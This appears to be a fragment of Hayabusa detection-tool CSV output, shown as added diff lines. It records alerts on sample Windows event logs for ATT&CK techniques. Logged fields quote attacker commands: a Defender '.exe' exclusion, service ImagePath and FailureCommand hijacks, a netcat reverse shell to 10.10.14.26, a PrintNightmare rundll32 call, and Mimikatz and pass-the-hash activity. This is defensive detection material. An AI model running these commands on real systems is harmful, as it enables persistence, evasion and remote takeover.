value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx
+2021-10-06 20:14:56.425 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx
+2021-10-06 20:14:56.432 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx
+2021-10-06 20:14:56.435 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx
+2021-10-06 20:15:06.651 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx
+2021-10-06 20:15:06.667 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -ExclusionExtension '.exe',../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx
+2021-10-06 20:15:06.754 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""ExclusionExtension""; value="".exe"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx
+2021-10-06 20:15:06.755 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx
+2021-10-06 20:15:06.762 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx
+2021-10-06 20:15:06.766 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx
+2021-10-07 23:52:54.848 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: REG ADD ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time"" /v FailureCommand /t REG_SZ /d ""C:\tmp\pentestlab.exe"" | Path: C:\Windows\System32\reg.exe | PID: 0x2a58 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx
+2021-10-07 23:53:02.147 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc failure W32Time command= ""\""c:\Windows\system32\pentestlab.exe\"""" | Path: C:\Windows\System32\sc.exe | PID: 0xa00 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx
+2021-10-08 00:36:23.429 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc config xboxgip binPath= ""C:\windows\system32\pentestlab.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x29cc | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx
+2021-10-08 00:36:24.892 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xboxgip"" /v ImagePath /t REG_SZ /d ""C:\tmp\pentestlab.exe"" | Path: C:\Windows\System32\reg.exe | PID: 0x11b8 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx
+2021-10-08 03:21:36.864 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx
+2021-10-08 03:21:36.889 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Set-ItemProperty -path HKLM:\System\CurrentControlSet\services\xboxgip -name ImagePath -value ""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx
+2021-10-08 03:21:37.136 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-ItemProperty): ""Set-ItemProperty"" ParameterBinding(Set-ItemProperty): name=""Path""; value=""HKLM:\System\CurrentControlSet\services\xboxgip"" ParameterBinding(Set-ItemProperty): name=""Name""; value=""ImagePath"" ParameterBinding(Set-ItemProperty): name=""Value""; value=""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx
+2021-10-08 03:21:37.137 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx
+2021-10-08 03:21:37.143 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx
+2021-10-08 03:21:37.146 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx
+2021-10-08 03:30:51.237 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx
+2021-10-08 03:30:51.247 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Set-ItemProperty -path HKLM:\System\CurrentControlSet\services\xboxgip -name FailureCommand -value ""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx
+2021-10-08 03:30:51.251 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-ItemProperty): ""Set-ItemProperty"" ParameterBinding(Set-ItemProperty): name=""Path""; value=""HKLM:\System\CurrentControlSet\services\xboxgip"" ParameterBinding(Set-ItemProperty): name=""Name""; value=""FailureCommand"" ParameterBinding(Set-ItemProperty): name=""Value""; value=""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx
+2021-10-08 03:30:51.252 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx
+2021-10-08 03:30:51.266 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx
+2021-10-08 03:30:51.269 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx
+2021-10-08 17:53:42.131 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc sdset xboxgip ""D:(A;;CCLCSWRPWPDTLOCRRC;;;SY) | Path: C:\Windows\System32\sc.exe | PID: 0x1d28 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (sc).evtx
+2021-10-08 19:05:29.432 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\XblGameSave\Security"" /v Security /t REG_BINARY /d fe340ead | Path: C:\Windows\System32\reg.exe | PID: 0x18c4 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx
+2021-10-08 19:05:36.298 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2af0 | User: WIN10-02$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx
+2021-10-08 21:56:58.803 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
+2021-10-08 21:57:04.504 +09:00,fs01.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
+2021-10-08 21:57:06.763 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: gentilguest | IP Address: 20.188.56.147 | Process:  | Target Server: printnightmare.gentilkiwi.com,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
+2021-10-08 21:57:06.763 +09:00,fs01.offsec.lan,4648,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
+2021-10-08 21:57:06.869 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: rundll32 printui.dll,PrintUIEntry /in /n""\\printnightmare.gentilkiwi.com\Kiwi Legit Printer"" | Path: C:\Windows\System32\rundll32.exe | PID: 0x1670 | User: admmig | LID: 0x65b0f5db",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
+2021-10-08 21:57:06.869 +09:00,fs01.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
+2021-10-08 21:57:18.646 +09:00,fs01.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
+2021-10-08 21:57:19.072 +09:00,fs01.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
+2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx
+2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx
+2021-10-19 23:42:41.234 +09:00,FS03.offsec.lan,4720,low,Persis,Local User Account Created,User: toto3 | SID: S-1-5-21-3410678313-1251427014-1131291384-1004,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx
+2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx
+2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx
+2021-10-20 18:18:07.101 +09:00,FS03.offsec.lan,11,medium,,File Created_Sysmon Alert,T1003 | Path: C:\Windows\System32\mimilsa.log | Process: C:\Windows\system32\lsass.exe | PID: 512 | PGUID: 7CF65FC7-6649-6165-0B00-000000001200,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-Mimikatz LSA SSP clear text password exfiltration.evtx
+2021-10-20 18:18:07.101 +09:00,FS03.offsec.lan,11,critical,CredAccess,Mimikatz MemSSP Default Log File Creation,,../hayabusa-rules/sigma/file_event/file_event_mimimaktz_memssp_log_file.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-Mimikatz LSA SSP clear text password exfiltration.evtx
+2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,info,,Logon Type 9 - NewCredentials,User: admmig | Computer: - | IP Addr: ::1 | LID: 0x266e045 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x266e045,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,LatMov,Successful Overpass the Hash Attempt,,../hayabusa-rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 23:18:43.326 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:43.326 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
